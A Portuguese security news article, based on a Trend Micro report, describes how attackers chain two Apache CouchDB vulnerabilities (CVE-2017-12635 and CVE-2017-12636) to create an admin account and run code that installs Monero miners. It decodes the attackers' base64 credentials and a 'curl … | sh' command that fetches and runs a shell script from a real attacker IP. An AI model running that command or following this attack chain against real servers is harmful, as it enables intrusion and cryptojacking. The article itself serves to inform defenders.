Foram identificadas duas vulnerabilidades no Apache CouchDB e que podem ser exploradas para mineração do Monero.

Criptomoedas estão na moda. Com isso, os ataques para mineração ilicita de moedas digitais também tem aumentado descontroladamente — estamos na era do crypto-jacking.

A Trend Micro refere que, com base na sua monitorização à escala global detetou um novo ataque que explora duas vulnerabilidades num SGBD muito popular, e que leva os atacantes a explorar a criptomeda Monero.

O Apache CouchDB — que é um sistema para gestão de SGBDs de código aberto, e projeto para combinar uma arquitetura escalável com uma interface fácil de usar — está sobre ataque.

As duas vulnerabilidades são identificadas são as seguintes:

  • Apache CouchDB JSON Remote Privilege Escalation Vulnerability (CVE-2017-12635)
  • Apache CouchDB _config Command Execution (CVE-2017-12636)

 

Devido a difenças nos parsers do CouchDB, a exploração destas vulnerabilidades pode fornecer aos invasores chaves duplicadas que lhes permite controlar áreas de acesso privilegiado dentro do sistema. Os atacantes podem então usar essas funções para executar código arbitrário.

Estas vulnerabilidades foram remendadas em novembro de 2017.

 

Como funciona o processo malicioso?

Apesar disso, muitos sistemas não foram “up-to-date” e foi em fevereiro o maior pico de exploração destas vulnerabilidades.

CouchDB-1

Com base no packet trace abaixo, o CVE-2017-12635 é primeiro explorado para configurar uma conta CouchDB com permissões de administração.

CouchDB-2

 

A conta de administrador é usada para atacante se autenticar e para explorar a vulnerabilidade de execução de código remoto CVE-2017-12636:

CouchDB-3

 

A autorização  dG9wa2VrMTEyOnRvcGtlazExMg== pode ser “decoded” porque é usado o codificador base64, obtendo-se assim as credenciais para fácil leitura:

  • Username: topkek112
  • Password: topkek112

 

A string Y3VybCBodHRwOi8vOTQuMjUwLjI1My4xNzgvbG9nbzYuanBnfHNo também pode ser decoded com o algoritmo base64:

  • curl hxxp://94.250.253.178/logo6.jpg|sh

 

Esta hiperligação é usada pelos hackers e permite descarregar o ficheiro “logo6.jpg” que é uma Bourne shell e que permite assumir o controlo da máquina infetada.

Os atacantes descarregam em seguida o “minerador” malicioso, instalaram na máquina infetada e colocam a sua execução o cron.

 

Fonte:

https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/